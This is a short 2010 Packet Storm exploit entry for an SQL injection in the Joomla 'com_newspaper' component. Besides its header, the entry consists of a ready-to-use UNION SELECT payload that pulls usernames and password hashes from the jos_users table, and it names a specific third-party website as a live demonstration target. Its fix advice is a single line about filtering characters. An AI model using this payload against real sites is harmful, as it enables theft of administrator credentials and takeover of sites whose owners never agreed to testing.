Joomla Newspaper SQL Injection

2010-08-24T00:00:00
ID PACKETSTORM:92976
Type packetstorm
Reporter Fl0riX
Modified 2010-08-24T00:00:00

Description

                                        
                                            `  
<------------------- header data start ------------------- >  
#############################################################  
Joomla Component Newspaper SQL Injection Vulnerability   
#############################################################  
  
# Author : Fl0riX ~ Bug Researchers  
  
# Name : Joomla Com_newspaper  
  
# Bug Type : SQL injection  
  
# Infection : Admin Login Bilgileri Alinabilir.  
  
# Demo Vuln :  
http://www.zampe-zampe.it/index.php?option=com_newspaper&view=article&article_id=[EXPLOIT]  
  
# Bug Fix Advice : Zararli Karakterler Filtrenmelidir.  
#############################################################  
< ------------------- header data end of ------------------- >  
< -- bug code start -- >  
EXPLOIT :  
null+union+select+1,2,concat(username,0x3a,password)fl0rix,4,5,6,7+from+jos_users  
< -- bug code end of -- >   
`